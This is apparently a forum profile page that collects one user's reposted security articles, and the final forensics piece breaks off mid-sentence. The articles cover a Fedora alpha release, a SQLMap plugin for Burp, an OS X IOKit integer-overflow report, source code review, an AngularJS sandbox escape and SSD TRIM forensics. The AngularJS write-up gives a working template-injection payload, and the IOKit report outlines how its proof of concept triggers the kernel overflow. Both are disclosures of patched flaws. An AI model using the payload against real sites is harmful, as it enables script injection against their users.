-
Posts
18715 -
Joined
-
Last visited
-
Days Won
701
Everything posted by Nytro
-
Fedora 21 Alpha Is Out – Screenshot Tour The Fedora 21 Alpha can be downloaded from Softpedia By Silviu Stahie on September 24th, 2014 07:36 GMT The Fedora Project has announced that the first Alpha release for Fedora 21 is now available for download and testing, marking the beginning of a new journey for this famous distribution. The Fedora development team has been trying to get this Alpha release out the door for quite some time and they have been confronted with all sorts of problems that delayed the release. Now it's out and we get to test it properly. Users shouldn't get their hopes up for the final release of Fedora. The developers don't have the best track record at keeping a tight schedule for the upcoming builds, so it's very likely that the final iteration will also be pushed back.It's a new Fedora Fedora 21 is the first distribution in the series that doesn't have a code name. The previous release was called "Heisenbug." Not many users liked it, so they dropped the naming process entirely. Besides this simple move, the developers have also split the project into Fedora Server, Fedora Cloud, and Fedora Workstation. "The Alpha release contains all the exciting features of Fedora 21's products in a form that anyone can help test. This testing, guided by the Fedora QA team, helps us target and identify bugs. When these bugs are fixed, we make a Beta release available. A Beta release is code-complete and bears a very strong resemblance to the third and final release. The final release of Fedora 21 is expected in December." "We need your help to make Fedora 21 the best release yet, so please take some time to download and try out the Alpha and make sure the things that are important to you are working. If you find a bug, please report it - every bug you uncover is a chance to improve the experience for millions of Fedora users worldwide. Together, we can make Fedora a rock-solid distribution," say the developers.Get the Fedora 21 Alpha and test it As you can see, regular users should be interested in Fedora 21 Workstation, which is basically the desktop edition. The devs are tracking the GNOME 3.14 release and they will integrate it by default. Because the release has been delayed by a few weeks, it will no longer be among the first operating systems to adopt the new version of the GNOME desktop environment. Check the official announcement for more details about this build. You can download Fedora 21 right now from Softpedia. This is a Live CD and it seems to work just fine from a USB drive. If you decide to install it, please don't use a production machine, as the distro is still under development. Sursa: Fedora 21 Alpha Is Out – Screenshot Tour - Softpedia
-
[h=1]SQLiPy: A SQLMap Plugin for Burp[/h] By codewatch On September 22, 2014 · Leave a Comment I perform quite a few web app assessments throughout the year. Two of the primary tools in my handbag for a web app assessment are Burp Suite Pro and SQLMap. Burp Suite is a great general purpose web app assessment tool, but if you perform web app assessments you probably already know because you are probably already using it. SQLMap complements Burp Suite nicely with its great SQL injection capabilities. It has astounded me in the past, as flexible and extensible as Burp is, that no one has written a better plugin to integrate the two (or maybe they did and I just missed it). The plugins that I have come across in the past fit in one of two categories: They generate the command line arguments that you want to run, and then you have to copy those arguments to the command line and run SQLMap yourself (like co2); or They kick off a SQLMap scan and essentially display what you would see if run in a console window (like gason) I’m not much of a developer, so I never really considered attempting to integrate the two myself until the other day that I was browsing in the SQLMap directory on my machine recently and noticed the file sqlmapapi.py. I’d never noticed it before (I’m not sure why), but when I did I immediately started looking into the purpose of the script. The sqlmapapi.py file is essentially a web server with a RESTful interface that enables you to configure, start, stop, and get the results from SQLMap scans by passing it options via JSON requests. This immediately struck me as an easy way in which to integrate Burp with SQLMap. I began researching the API and was very fortunate that someone already did the leg work for me. The following blog post outlines the API: Volatile Minds: Unofficial SQLmap RESTful API documentation. Once I had the API down I set out to write the plugin. The key features that I wanted to integrate were: The ability to start the API from within Burp. Note that this is not recommend as one of the limitations of Jython is that when you start a process with popen, you can’t get the PID, which means you can’t stop the process from within Jython (you have to manually kill it). A context menu option for sending a request in Burp to the plugin. A menu for editing and configuring the request prior to sending to SQLMap. A thread that continuously checks up on executed scans to identify whether there were any findings. Addition of information enumerated from successful SQLMap scans to the Burp Scanner Results list. All of those features have been integrated into this first release. I have limited ability to test so I appreciate anyone that can use the plugin and provide feedback. Some general notes on the plugin development: This is the first time I’ve attempted to develop a Burp plugin. The fact that I was able to do so with relative ease shows how easy the Burp guys have made it. This is also the first time I’ve used Jython, or used any Java GUI code. The code probably looks awful and I need more comments. See points 1 & 2 above and add in the fact that I’m not a developer. I reviewed the source code for numerous plugins to help me understand the nuances of working with Python/Jython/Java and integrating with Burp. The source of the following plugins was reviewed to help me understand how to build this: Payload Parser Burp SAML ActiveScan++ WCF Binary SOAP Handler WSDL Wizard co2 Articol complet: https://www.codewatch.org/blog/?p=402
-
OS X IOKit kernel code execution due to integer overflow in IODataQueue::enqueue The class IODataQueue is used in various places in the kernel. There are a couple of exploitable integer overflow issues in the ::enqueue method: Boolean IODataQueue::enqueue(void * data, UInt32 dataSize) { const UInt32 head = dataQueue->head; // volatile const UInt32 tail = dataQueue->tail; const UInt32 entrySize = dataSize + DATA_QUEUE_ENTRY_HEADER_SIZE; <-- (a) IODataQueueEntry * entry; if ( tail >= head ) { // Is there enough room at the end for the entry? if ( (tail + entrySize) <= dataQueue->queueSize ) <-- ( { entry = (IODataQueueEntry *)((UInt8 *)dataQueue->queue + tail); entry->size = dataSize; memcpy(&entry->data, data, dataSize); <-- (c) The additions at (a) and ( should be checked for overflow. In both cases, by supplying a large value for dataSize an attacker can reach the memcpy call at (c) with a length argument which is larger than the remaining space in the queue buffer. The majority of this PoC involves setting up the conditions to actually be able to reach a call to ::enqueue with a controlled dataSize argument, the bug itself it quite simple. This PoC creates an IOHIDLibUserClient (IOHIDPointingDevice) and calls the create_queue externalMethod to create an IOHIDEventQueue (which inherits from IODataQueue.) This is the queue which will have the ::enqueue method invoked with the large dataSize argument. The PoC then calls IOConnectMapMemory with a memoryType argument of 0 which maps an array of IOHIDElementValues into userspace: typedef struct _IOHIDElementValue { IOHIDElementCookie cookie; UInt32 totalSize; AbsoluteTime timestamp; UInt32 generation; UInt32 value[1]; }IOHIDElementValue; The first dword of the mapped memory is a cookie value and the second is a size. When the IOHIDElementPrivate::processReport method is invoked (in response to an HID event) if there are any listening queues then the IOHIDElementValue will be enqueued - and the size is in shared memory The PoC calls the startQueue selector to start the listening queue then calls addElementToQueue passing the cookie for the first IOHIDElementValue and the ID of the listening queue. A loop then overwrites the totalSize field of the IOHIDElementValue in shared memory with 0xfffffffe. When the processReport method is called this will call IODataQueue::enqueue and overflow the calculation of entry size such that it will attempt to memcpy 0xfffffffe bytes. Note that the size of the queue buffer is also attacked controlled, and the kernel is 64-bit, so a 4gb memcpy is almost certainly exploitable. Note that lldb seems to get confused by the crash - the memcpy implementation uses rep movsq and lldb doesn't seem to understand the 0xf3 (rep) prefix - IDA disassembles the function fine though. Also the symbols for memcpy and real_mode_bootstrap_end seem to have the same address so the lldb backtrace looks weird, but it is actually memcpy. hidlib_enqueue_overflow.c 6.7 KB Download Sursa: https://code.google.com/p/google-security-research/issues/detail?id=39
-
5 Vulnerabilities That Surely Need a Source Code Review
Nytro posted a topic in Tutoriale in engleza
[h=3]5 Vulnerabilities That Surely Need a Source Code Review[/h] We have been performing Source Code Review (SCR) of multiple Java/JavaEE based Web Applications during the recent past. The results have convinced us and the customers that SCR is a valuable exercise that must be performed for business critical applications in addition to Penetration Testing. In terms of vulnerabilities, SCR has the potential to find some of the vulnerability classes that an Application Penetration Test will usually miss out. In this article we will provide a brief overview of some of the vulnerability classes which we frequently discover during an SCR that are missed out or very difficult to identify during Penetration Testing. Additionally we hope we will be able to provide answers for the following commonly asked questions: I have already performed an Application Penetration Test. Do I still need to conduct a Source Code Review for the same application? What are the vulnerabilities found during Source Code Review that are often missed by Application Penetration Test? Read More: Web Application Penetration Testing Service [h=3]Approach for Source Code Review[/h] The approach for SCR is fundamentally different from an Application Penetration Test. While an Application Penetration Test is driven by apparently visible use-cases and functionalities, the maximum possible view of the application in terms of its source code and configuration is usually available during an SCR. Apart from auditing important use-cases following standard practices, our approach consists of two broad steps: [h=4][/h] [h=4]Finding Security Weaknesses (Insecure/Risky Code Blocks) (Sinks)[/h] A security weakness is an insecure practice or a dangerous API call or an insecure design. Some examples of weaknesses are: Dynamic SQL Query: string query = "SELECT * FROM items WHERE owner = '" + userName + "' AND itemname = '" + ItemName.Text + "'"; Dangerous or risky API call such as RunTime.exec, Statement.execute Insecure Design such as using only MD5 hashing of passwords without any salt. [h=4]Correlation between Security Weakness and Dynamic Input[/h] Dynamic construction of an SQL Query without the necessary validation or sanitization is definitely a security weakness, however it may not lead to security vulnerability if the SQL query does not involve any untrusted data. Hence it is required to identify code paths that start with an user input and reaches a possibly weak or risky code block. The absence of this phase will leave huge number of false positive in the results. This step generally involves enumerating sources and finding a path between source to sink. A source in this case is any user controlled and untrusted input e.g. HTTP request parameters, cookies, uploaded file contents etc. [h=3]Five Vulnerabilities Source Code Review should Find[/h] [h=4]1. Insecure or Weak Cryptographic Implementation[/h] SCR is a valuable exercise to discover weak or below standard cryptography techniques used in applications such as: Use of MD5 or SHA1 without salt for password hashing. Use of Java Random instead of SecureRandom. Use of weak DES encryption. Use of weak mode of otherwise strong encryption such as AES with ECB. Susceptibility to Padding Oracle Attack. [h=4]2. Known Vulnerable Components[/h] For a small-medium scale JavaEE based application, 80% of the code that is executed at runtime comes from libraries. The actual percentage for a given application can be identified by referencing Maven POM file, IVY dependency file or looking into the lib directory. It is a very common possibility for dependent libraries and framework components to have known vulnerabilities especially if the application is developed over considerable time frame. As an example, during 2011, following two vulnerable components were downloaded 22 million times: Apache CXF with Authentication Bypass Vulnerability Spring Framework with Remote Code Execution Vulnerability During an SCR, known vulnerable components are easier to detect due to source code access and knowledge of exact version number of various libraries and framework components used, something that is lacking during an Application Penetration Testing. [h=4]3. Sensitive Information Disclosure[/h] An SCR should discover if an application in binary (jar/war) or source code form may disclose sensitive information that may compromise the security of the production environment. Some of the commonly seen cases are: Logs: Application logs sensitive information such as credentials or access keys in log files. Configuration Files: Application discloses sensitive information such as shared secret or passwords in plain text configuration files. Hardcoded Passwords and Keys: Many applications depend on encryption keys that are hardcoded within the source code. If an attacker manages to obtain even a binary copy of the application, it is possible to extract the key and hence compromise the security of the sensitive data. Email address of Developers in Comments: A minor issue, but hardcoded email addresses and names of developers can provide valuable information to attackers to launch social engineering or spear phishing attacks. [h=4]4. Insecure Functionalities[/h] An enterprise application usually goes through various transformations and releases. The application might have legacy functionality with security implications. An SCR should be able to find such legacy functionality and identify its security implications. Some of the examples of legacy functionalities with known security issues are given below: RMI calls over insecure channel. Kerberos implementation that are vulnerable to replay attack. Legacy authentication & authorization technique with known weaknesses. J2EE bad practices such as direct management of database/resource connection that may lead to a Denial of Service. Race condition bugs. [h=4]5. Security Misconfiguration[/h] SCR should be able to find common security misconfiguration in application and its deployed environment related to database configuration, frameworks, application containers etc. Some of the commonly discovered issues include: Application containers and database servers are running with highest (unnecessary) privilege. Default accounts with password enabled and unchanged. Insecure local file storage. [h=3]Additional Notes[/h] An in-depth Source Code Review exercise is a valuable activity that has significant additional benefits apart from those mentioned above. It is possible to conduct an in-depth review of implementation of security controls such as Cross-site Request Forgery (CSRF) prevention, Cross-site Scripting (XSS) prevention, SQL Injection prevention etc. It is not uncommon to find codes that lack or misuse such controls in a vulnerable manner resulting in bypass of protection. There are multiple APIs that are considered to be risky or insecure as per various secure coding guidelines. It is possible to discover usage of such API in a given application easily and quickly during an SCR process. SCR has the added benefit of being non-disruptive i.e. this activity does not require access to production environment and will not cause any service disruption. Source Code Review (SCR) is a valuable technique to discover vulnerabilities in your Enterprise Application. It discovers certain class of vulnerabilities, which are difficult to find by conventional Application Penetration Testing. However, it must be noted that Application Penetration Testing and Source Code Review are complementary in many ways and both independently contribute in enhancing overall security of application and infrastructure. Sursa: 5 Vulnerabilities That Surely Need a Source Code Review -
Da. "Daca compari un pointer la o functie cu un numar, eu fac automat conversia lor la string si le compar ca pe niste siruri de caractere" - Javascript Because fuck logic, that's why.
-
___ __ _______ _____ ____ __ / | ____ ____ ___ __/ /___ ______ / / ___/ / ___/____ _____ ____/ / /_ ____ _ __ / /_ __ ______ ____ ___________ / /| | / __ \/ __ `/ / / / / __ `/ ___/_ / /\__ \ \__ \/ __ `/ __ \/ __ / __ \/ __ \| |/_/ / __ \/ / / / __ \/ __ `/ ___/ ___/ / ___ |/ / / / /_/ / /_/ / / /_/ / / / /_/ /___/ / ___/ / /_/ / / / / /_/ / /_/ / /_/ /> < / /_/ / /_/ / /_/ / /_/ (__ |__ ) /_/ |_/_/ /_/\__, /\__,_/_/\__,_/_/ \____//____/ /____/\__,_/_/ /_/\__,_/_.___/\____/_/|_| /_.___/\__, / .___/\__,_/____/____/ /____/ /____/_/ In my recent research I discovered a bypass to the AngularJS "sandbox", allowing me to execute arbitrary JavaScript from within the Angular scope, while not breaking any of the implemented rules (eg. Function constructor can't be accessed directly). The main reason I was allowed to do this is because functions executing callbacks, such as Array.sort(), Array.map() and Array.filter() are allowed. If we use the Function constructor as callback, we can carefully construct a payload that generates a valid function that we control both the arguments for, as well as the function body. This results in a sandbox bypass. Example: {{toString.constructor.prototype.toString=toString .constructor.prototype.call;["a","alert(1)"].sort(toString.constructor)}} JSFiddle: http://jsfiddle.net/uwwov8oz Let's break that down. Function constructor can be accessed via toString.constructor. {{Function.prototype.toString=Function.prototype.c all;["a","alert(1)"].sort(Function)}} We can run the Function constructor with controlled arguments with ["a", "alert(1)"].sort(Function). This will generate this psuedo-code: if(Function("a","alert(1)") > 1){ //Sort element "a" as bigger than "alert(1)" }else if(Function("a","alert(1)") < 1){ //Sort element "a" as smaller than "alert(1)" }else{ // Sort elements as same } Function("a","alert(1)") is equivalent to function(a){alert(1)}. So let's edit that. if((function(a){alert(1)}) > 1){ //Sort element "a" as bigger than "alert(1)" }else if((function(a){alert(1)}) < 1){ //Sort element "a" as smaller than "alert(1)" }else{ // Sort elements as same } Now, to understand the next part we must know how JS internals handles comparison of functions. It will convert the function to a string using the toString method (inherited from Object) and compare it as string. We can show this by running this code: alert==alert.toString(). if((function(a){alert(1)}).toString() > 1..toString()){ //Sort element "a" as bigger than "alert(1)" }else if((function(a){alert(1)}).toString() < 1..toString()){ //Sort element "a" as smaller than "alert(1)" }else{ // Sort elements as same } So to sum up: We can create a function where we control the arguments ("a"), as well as the function body ("alert(1)"), and that generated function will be converted to a string using the toString() function. So all we have to do is replace the Function.prototype.toString() function with the Function.prototype.call() function, and when the comparison runs in the psuedocode, it will run like this: if((function(a){alert(1)}).call() > 1..toString()){ //Sort element "a" as bigger than "alert(1)" }else if((function(a){alert(1)}).call() < 1..toString()){ //Sort element "a" as smaller than "alert(1)" }else{ // Sort elements as same } Since (function(a){alert(1)}).call() is a perfectly valid way of creating and executing a function, and given that we control both the arguments and the function body, we can safely assume that we can execute arbitrary JavaScript using this method. The same logic can be applied to the other callback functions. I'm not really sure why using the constructor property like this (eg. toString.constructor) works, since it didn't in 1.2.18 and down. Last, this is now fixed as of AngularJS version 1.2.24 and up (only 1 week from original report until patch!) and I got $5000 bug bounty for this bypass Changelog: https://github.com/angular/angular.js/commit/b39e1d47b9a1b39a9fe34c847a81f589fba522f8 over and out, avlidienbrunn Video: Sursa: http://avlidienbrunn.se/angular.txt
-
Recovering Evidence from SSD Drives in 2014: Understanding TRIM, Garbage Collection and Exclusions Posted by belkasoft ? September 23, 2014 We published an article on SSD forensics in 2012. SSD self-corrosion, TRIM and garbage collection were little known and poorly understood phenomena at that time, while encrypting and compressing SSD controllers were relatively uncommon. In 2014, many changes happened. We processed numerous cases involving the use of SSD drives and gathered a lot of statistical data. We now know more about many exclusions from SSD self-corrosion that allow forensic specialists to obtain more information from SSD drives. Introduction Several years ago, Solid State drives (SSD) introduced a challenge to digital forensic specialists. Forensic acquisition of computers equipped with SSD storage became very different compared to acquisition of traditional hard drives. Instead of straightforward and predictable recovery of evidence, we are in the waters of stochastic forensics with SSD drives, where nothing can be assumed as a given. With even the most recent publications not going beyond introducing the TRIM command and making a conclusion on SSD self-corrosion, it has been common knowledge – and a common misconception, – that deleted evidence cannot be extracted from TRIM-enabled SSD drives, due to the operation of background garbage collection. However, there are so many exceptions that they themselves become a rule. TRIM does not engage in most RAID environments or on external SSD drives attached as a USB enclosure or connected via a FireWire port. TRIM does not function in a NAS. Older versions of Windows do not support TRIM. In Windows, TRIM is not engaged on file systems other than NTFS. There are specific considerations for encrypted volumes stored on SSD drives, as various crypto containers implement vastly different methods of handling SSD TRIM commands. And what about slack space (which has a new meaning on an SSD) and data stored in NTFS MFT attributes? Different SSD drives handle after-TRIM reads differently. Firmware bugs are common in SSD drives, greatly affecting evidence recoverability. Finally, the TRIM command is not issued (and garbage collection does not occur) in the case of data corruption, for example, if the boot sector or partition tables are physically wiped. Self-encrypting SSD drives require a different approach altogether, while SSD drives using compressing controllers cannot be practically imaged with off-chip acquisition hardware. Our new research covers many areas where evidence is still recoverable – even on today’s TRIM-enabled SSD drives. SSD Self-Corrosion In case you haven’t read our 2012 paper on SSD forensics, let’s stop briefly on why SSD forensics is different. The operating principle of SSD media (as opposed to magnetic or traditional flash-based storage) allows access to existing information (files and folders) stored on the disk. Deleted files and data that a suspect attempted to destroy (by e.g. formatting the disk, even if “Quick Format” was engaged) may be lost forever in a matter of minutes. And even shutting the affected computer down immediately after a destructive command has been issued, does not stop the destruction. Once the power is back on, the SSD drive will continue wiping its content clear all by itself, even if installed into a write-blocking imaging device. If a self-destruction process has already started, there is no practical way of stopping it unless we’re talking of some extremely important evidence, in which case the disk accompanied with a court order can be sent to the manufacturer for low-level, hardware-specific recovery. The evidence self-destruction process is triggered with the TRIM command issued by the operating system to the SSD controller at the time the user deletes a file, formats the disk or deletes a partition. The TRIM operation is fully integrated with partition- and volume-level commands. This includes formatting the disk or deleting partitions; file system commands responsible for truncating and compressing data, and System Restore (Volume Snapshot) operations. Note that the data destruction process is only triggered by the TRIM command, which must be issued by the operating system. However, in many cases the TRIM command is NOT issued. In this paper, we concentrate on these exclusions, allowing investigators to gain better understanding of situations when deleted data can still be recovered from an SSD drive. However, before we begin that part, let’s see how SSD drives of 2014 are different from SSD drives made in 2012. Checking TRIM Status When analyzing a live system, it is easy to check a TRIM status for a particular SSD device by issuing the following command in a terminal window: fsutil behavior query disabledeletenotify You’ll get one of the following results: DisableDeleteNotify = 1 meaning that Windows TRIM commands are disabled DisableDeleteNotify = 0 meaning that Windows TRIM commands are enabled fsutil is a standard tool in Windows 7, 8, and 8.1. On a side note, it is possible to enable TRIM with “fsutil behavior set disabledeletenotify 0” or disable TRIM with “fsutil behavior set disabledeletenotify 1“. Figure 1 TRIM, image taken from http:/www.corsair.com/us/blog/how-to-check-that-trim-is-active/ Note that using this command only makes sense if analyzing the SSD which is still installed in its original computer (e.g. during a live box analysis). If the SSD drive is moved to a different system, the results of this command are no longer relevant. SSD Technology: 2014 Back in 2012, practically all SSD drives were already equipped with background garbage collection technology and recognized the TRIM command. This did not change in 2014. Two years ago, SSD compression already existed in SandForce SSD Controllers (http:/en.wikipedia.org/wiki/SandForce). However, relatively few models were equipped with encrypting or compressing controllers. As SandForce remained the only compressing controller, it was easy to determine whether it was the case. (http:/www.enterprisestorageforum.com/technology/features/article.php/3930601/Real-Time-Data-Compressions-Impact-on–SSD-Throughput-Capability-.htm). In 2013, Intel used a custom-firmware controlled version of a SandForce controller to implement data compression in 3xx and 5xx series SSDs (http:/www.intel.com/support/ssdc/hpssd/sb/CS-034537.htm), claiming reduced write amplification and increased endurance of a SSD as the inherent benefits (http:/www.intel.de/content/dam/www/public/us/en/documents/technology-briefs/ssd-520-tech-brief.pdf). Marvell controllers are still non-compressing (http:/blog.goplextor.com/?p=3313), and so are most other controllers on the market including the new budget option, Phison. Why so much fuzz about data compression in SSD drives? Because the use of any technology altering binary data before it ends up in the flash chips makes its recovery with third-party off-chip hardware much more difficult. Regardless of whether compression is present or not, we have not seen many successful implementations of SSD off-chip acquisition products so far, TEEL Tech (http:/www.teeltech.com/mobile-device-forensics-training/advanced-bga-chip-off-forensics/) being one of rare exceptions. Let’s conclude this chapter with a quote from PC World: “The bottom line is that SSDs still are a capacity game: people buy the largest amount of storage they can within their budget, and they ignore the rest.” http:/www.pcworld.com/article/2087480/ssd-prices-face-uncertain-future-in-2014.html In other words, SSD’s get bigger and cheaper, inevitably demanding some cost-saving measures which, in turn, may affect how deleted data are handled on these SSD drives in a way described later in the Reality Steps In: Why SSDs from Sub-Notes are Recoverable chapter. SSD Manufacturers In recent years, we’ve seen a lot of new SSD “manufacturers” entering the arena. These companies don’t normally build their own hardware or design their own firmware. Instead, they simply spec out the disks to a real manufacturer that assembles the drives based on one or another platform (typically, SandForce or Phison) and one or another type, make and size of flash memory. In the context of SSD forensics, these drives are of interest exactly because they all feature a limited choice of chipsets and a limited number of firmware revisions. In fact, just two chipset makers, SandForce and Phison, enabled dozens of “manufacturers” make hundreds of nearly indistinguishable SSD models. So who are the real makers of SSD drives? According to Samsung, we have the following picture: (Source: http:/www.kitguru.net/components/ssd-drives/anton-shilov/samsung-remains-the-worlds-largest-maker-of-ssds-gartner/) Hardware for SSD Forensics (and Why It Has Not Arrived) Little has changed since 2012 in regards to SSD-specific acquisition hardware. Commonly available SATA-compliant write-blocking forensic acquisition hardware is used predominantly to image SSD drives, with BGA flash chip acquisition kits rare as hen’s teeth. Why so few chip-off solutions for SSD drives compared to the number of companies doing mobile chip-off? It’s hard to say for sure, but it’s possible that most digital forensic specialists are happy with what they can extract via the SATA link (while there is no similar interface in most mobile devices). Besides, internal data structures in today’s SSD drives are extremely complex. Constant remapping and shuffling of data during performance and lifespan optimization routines make actual data content stored on the flash chips inside SSD drives heavily fragmented. We’re not talking about logical fragmentation on file system level (which already is a problem as SSD drives are never logically defragmented), but rather physical fragmentation that makes an SSD controller scatter data blocks belonging to a contiguous file to various physical addresses on numerous physical flash chips. In particular, massive parallel writes are what make SSD drives so much faster than traditional magnetic drives (as opposed to sheer writing speed of single flash chips). One more word regarding SSD acquisition hardware: write-blocking devices. Note that write-blocking imaging hardware does not stop SSD self-corrosion. If the TRIM command has been issued, the SSD drive will continue erasing released data blocks at its own pace. Whether or not some remnants of deleted data can be acquired from the SSD drive depends as much on acquisition technique (and speed), as on particular implementation of a particular SSD controller. Deterministic Read After Trim So let’s say we know that the suspect erased important evidence or formatted the disk just minutes before arrest. The SSD drive has been obtained and available for imaging. What exactly should an investigator expect to obtain from this SSD drive? Reported experience while recovering information from SSD drives varies greatly among SSD users. “I ran a test on my SSD drive, deleting 1000 files and running a data recovery tool 5 minutes after. The tool discovered several hundred files, but an attempt to recover returned a bunch of empty files filled with zeroes”, said one Belkasoft customer. “We used Belkasoft Evidence Center to analyze an SSD drive obtained from the suspect’s laptop. We were able to recover 80% of deleted files in several hours after they’ve been deleted”, said another Belkasoft user. Carving options in Belkasoft Evidence Center: for the experiment we set Unallocated clusters only and SSD drive connected as physical drive 0. Why such a big inconsistency in user experiences? The answer lies in the way the different SSD drives handle trimmed data pages. Some SSD drives implement what is called Deterministic Read After Trim (DRAT) and Deterministic Zeroes After Trim (DZAT), returning all-zeroes immediately after the TRIM command released a certain data block, while some other drives do not implement this protocol and will return the original data until it’s physically erased with the garbage collection algorithm. Deterministic Read After Trim and Deterministic Zeroes After Trim have been part of the SATA specification for a long time. Linux users can verify that their SSD drives are using DRAT or DZAT by issuing the hdparm -I command returning whether the drive supports TRIM and does “Deterministic Read After Trim”. Example: $ sudo hdparm -I /dev/sda | grep -i trim * Data Set Management TRIM supported (limit 1 block) * Deterministic read data after TRIM However, the adoption of DRAT has been steadily increasing among SSD manufacturers. Two years ago we often saw reports on SSD drives with and without DRAT support. In 2014, the majority of new models came equipped with DRAT or DZAT. There are three different types of TRIM defined in the SATA protocol and implemented in different SSD drives. Non-deterministic TRIM: each read command after a Trim may return different data. Deterministic Trim (DRAT): all read commands after a TRIM shall return the same data, or become determinate. Note that this level of TRIM does not necessarily return all-zeroes when trimmed pages are accessed. Instead, DRAT guarantees that the data returned when accessing a trimmed page will be the same (“determined”) before and after the affected page has been processed by the garbage collection algorithm and until the page is written new data. As a result, the data returned by SSD drives supporting DRAT as opposed to DZAT can be all zeroes or other words of data, or it could be the original pre-trim data stored in that logical page. The essential point here is that the values read from a trimmed logical page do not change since the moment the TRIM command has been issued and before the moment new data get written into that logical page. Deterministic Read Zero after Trim (DZAT): all read commands after a TRIM shall return zeroes until the page is written new data. As we can see, in some cases the SSD will return non-original data (all zeroes, all ones, or some other non-original data) not because the physical blocks have been cleaned immediately following the TRIM command, but because the SSD controller tells that there is no valid data held at the trimmed address on a logical level previously associated with the trimmed physical block. If, however, one could possibly read the data directly from the physical blocks mapped to the logical blocks that have been trimmed, then the original data could be obtained from those physical blocks until the blocks are physically erased by the garbage collector. Apparently, there is no way to address the physical data blocks via the standard ATA command set, however, the disk manufacturer could most probably do this in their own lab. As a result, sending the trimmed SSD disk for recovery to the manufacturer may be a viable proposition if some extremely important evidence is concerned. Notably, DRAT is not implemented in Windows, as NTFS does not allow applications reading the trimmed data. Acquiring Evidence from SSD Drives So far the only practical way of obtaining evidence from an SSD drive remains the traditional imaging (with dedicated hardware/software combination), followed by an analysis with an evidence discovery tool (such as Belkasoft Evidence Center, http:/forensic.belkasoft.com/en/bec/en/evidence_center.asp). We now know more about the expected outcome when analyzing an SSD drive. There are generally two scenarios: either the SSD only contains existing data (files and folders, traces of deleted data in MFT attributes, unallocated space carrying no information), or the SSD contains the full information (destroyed evidence still available in unallocated disk space).Today, we can predict which scenario is going to happen by investigating conditions in which the SSD drive has been used. Scenario 1: Existing Files Only In this scenario, the SSD may contain some files and folders, but free disk space will be truly empty (as in “filled with zero data”). As a result, carving free disk space will return no information or only traces of information, while carving the entire disk space will only return data contained in existing files. So, is file carving useless on SSD drives? No way! Carving is the only practical way of locating moved or hidden evidence (e.g. renamed history files or documents stored in the Windows\System32 folder and renamed to .SYS or .DLL). Practically speaking, the same acquisition and analysis methods should be applied to an SSD drive as if we were analyzing a traditional magnetic disk. Granted, we’ll recover no or little destroyed evidence, but any evidence contained in existing files including e.g., deleted records from SQLite databases (used, for example, in Skype histories) can still be recovered (http:/forensic.belkasoft.com/en/recover-destroyed-sqlite-evidence-skype-and-iphone-logs). Scenario 2: Full Disk Content In the second scenario, the SSD disk will still contain the complete set of information – just like traditional magnetic disks. Obviously, all the usual techniques should be applied at the analysis stage including file carving. Why would an SSD drive NOT destroy evidence as a result of routine garbage collection? The garbage collection algorithm erasing the content of released data blocks does not occur if the TRIM command has not been issued, or if the TRIM protocol is not supported by any link of the chain. Let’s see in which cases this could happen. More than 1000 items were carved out of unallocated sectors of SSD hard drive, particularly, Internet Explorer history, Skype conversations, SQLite databases, system files and other forensically important types of data Operating System Support TRIM is a property of the operating system as much as it is the property of an SSD device. Older file systems do not support TRIM. Wikipedia http:/en.wikipedia.org/wiki/Trim_(computing) has a comprehensive table detailing the operating system support for the TRIM command. [TABLE] [TR] [TD]Operating System[/TD] [TD]Supported since[/TD] [TD]Notes[/TD] [/TR] [TR] [TD]DragonFly BSD[/TD] [TD]2011-05 May 2011[/TD] [TD][/TD] [/TR] [TR] [TD]FreeBSD[/TD] [TD]2010-078.1 – July 2010[/TD] [TD]Support was added at the block device layer in 8.1. File system support was added in FreeBSD 8.3 and FreeBSD 9, beginning with UFS. ZFS trimming support was added in FreeBSD 9.2. FreeBSD 10 will support trimming on software RAID configurations.[/TD] [/TR] [TR] [TD]Linux[/TD] [TD]2008-12-252.6.28-25 December 2008[/TD] [TD]Initial support for discard operations was added for FTL NAND flash devices in 2.6.28. Support for the ATA Trim command was added in 2.6.33.Not all file systems make use of Trim. Among the file systems that can issue Trim requests automatically are Ext4, Btrfs, FAT, GFS2 and XFS. However, this is disabled by default, due to performance concerns, but it can be enabled by setting the “discard” mount option. Ext3, NILFS2 and OCFS2 offer ioctls to perform offline trimming. The Trim specification calls for supporting a list of trim ranges, but as of kernel 3.0 trim is only invoked with a single range that is slower.[/TD] [/TR] [TR] [TD]Mac OS X[/TD] [TD]2011-06-2310.6.8 -23 June 2011[/TD] [TD]Although the AHCI block device driver gained the ability to display whether a device supports the Trim operation in 10.6.6 (10J3210), the functionality itself remained inaccessible until 10.6.8, when the Trim operation was exposed via the IOStorageFamily and file system (HFS+) support was added. Some online forums state that Mac OS X only supports Trim for Apple-branded SSDs; third-party utilities are available to enable it for other brands.[/TD] [/TR] [TR] [TD]Microsoft Windows[/TD] [TD]2009-10NT 6.1 (Windows 7 and Windows Server 2008 R2) – October 2009[/TD] [TD]Windows 7 only supports trim for ordinary (SATA) drives and does not support this command for PCI-Express SSDs that are different type of device, even if the device itself would accept the command. It is confirmed that with native Microsoft drivers the Trim command works in AHCI and legacy IDE / ATA Mode.[/TD] [/TR] [TR] [TD]OpenSolaris[/TD] [TD]2010-07 July 2010[/TD] [TD][/TD] [/TR] [TR] [TD]Android[/TD] [TD]2013-74.3 – 24 July 2013[/TD] [TD][/TD] [/TR] [/TABLE] Old Versions of Windows As shown in the table above, TRIM support was only added to Windows 7. Obviously, TRIM is supported in Windows 8 and 8.1. In Windows Vista and earlier, the TRIM protocol is not supported, and the TRIM command is not issued. As a result, when analyzing an SSD drive obtained from a system featuring one of the older versions of Windows, it is possible to obtain the full content of the device. Possible exception: TRIM-like performance can be enabled via certain third-party solutions (e.g. Intel SSD Optimizer, a part of Intel SSD Toolbox). MacOS X Mac OS X started supporting the TRIM command for Apple supplied SSD drives since version 10.6.8. Older builds of Mac OS X do not support TRIM. Notably, user-installed SSD drives not supplied by Apple itself are excluded from TRIM support. Old or Basic SSD Hardware Not all SSD drives support TRIM and/or background garbage collection. Older SSD drives as well as SSD-like flash media used in basic tablets and sub-notes (such as certain models of ASUS Eee) do not support the TRIM command. For example, Intel started manufacturing TRIM-enabled SSD drives with drive lithography of 34nm (G2); their 50nm SSDs do not have TRIM support. In reality, few SSD drives without TRIM survived that long. Many entry-level sub-notebooks use flash-based storage often mislabeled as “SSD” that does not feature garbage collection or supports the TRIM protocol. (Windows) File Systems Other than NTFS TRIM is a feature of the file system as much as the property of an SSD drive. At this time, Windows only supports TRIM on NTFS-formatted partitions. Volumes formatted with FAT, FAT32 and exFAT are excluded. Notably, some (older) SSD drives used trickery to work around the lack of TRIM support by trying to interpret the file system, attempting to erase dirty blocks not referenced from the file system. This 